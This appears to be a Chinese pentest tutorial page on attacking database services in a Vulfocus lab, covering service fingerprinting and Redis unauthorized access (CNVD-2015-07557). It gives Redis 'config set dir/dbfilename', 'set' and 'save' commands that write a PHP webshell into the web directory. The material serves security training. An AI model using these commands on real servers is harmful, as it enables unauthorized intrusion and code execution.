数据库安全&Redis&CouchDB&H2database&未授权访问&CVE 漏洞

前置知识:

1 、复现环境: Vulfocus( 官方在线的无法使用 )
官方手册: https://fofapro.github.io/vulfocus/#/
搭建踩坑:(无法同步)
https://blog.csdn.net/m0_64563956/article/details/131229046
2 、服务判断 :
端口扫描:利用服务开启后目标端口开放判断
组合判断:利用搭建常见组合分析可能开放服务
信息来源:访问端口提示软件版本,应用信息等
强弱特征:如框架 shiro 强特征 rememberMe,SpringBoot 默认页面等
3 、对象类别 :
对服务进行类别划分,通过服务功能理解,如数据库有帐号密码就有爆破利用方法,也可
以针对服务公开的 CVE 进行漏洞测试及服务常见的错误安全配置导致的未授权访问等。
4 、利用方法 :
主要集中在 CVE 漏洞,未授权访问,弱口令爆破等

数据库应用 -Redis- 未授权访问 &CVE 漏洞

默认端口: 6379
Redis 是一套开源的使用 ANSI C 编写、支持网络、可基于内存亦可持久化的日志型、
键值存储数据库,并提供多种语言的 API 。 Redis 如果在没有开启认证的情况下,可以
导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数
据。
1 、未授权访问: CNVD-2015-07557

  • 写 Webshell 需得到 Web 路径
    利用条件: Web 目录权限可读写
    config set dir /tmp # 设置 WEB 写入目录
    config set dbfilename 1.php # 设置写入文件名
    set test "<?php phpinfo();?>" # 设置写入文件代码
    bgsave # 保存执行
    save # 保存执行
    注意:部分没目录权限读写权限









相关推荐
vivo互联网技术3 小时前
从 10 分钟到 1 秒:ES 深度分页任意跳页的三轮优化实战
服务器·数据库·redis·elasticsearch·深度分页
倔强的石头_18 小时前
《Kingbase护城河》——猎捕慢查询:执行计划的微观解析与索引调优实战
数据库
SelectDB20 小时前
Apache Doris Python UDF:让 SQL 直接调用 Python 生态,支撑 Agent 时代复杂业务逻辑
大数据·数据库·python
jiayou642 天前
KingbaseES 表级与列级加密完全指南
数据库·后端
用户3074596982073 天前
Redis 延时队列详解
redis
GBASE3 天前
G术时刻 |GBase 8s数据库事务并发控制之封锁技术介绍(下)
数据库
烤代码的吐司君3 天前
Redis 数据结构 ZSet, BIT, HyperLogLog,Geo 空间数据
redis·后端
xiezhr3 天前
逛GitHub发现了一款免费的带AI功能的数据库管理工具
数据库·ai编程·dba
吃糖的小孩4 天前
给 QQ AI 机器人设计“可控记忆”:会话摘要、手动长期记忆与角色卡边界
数据库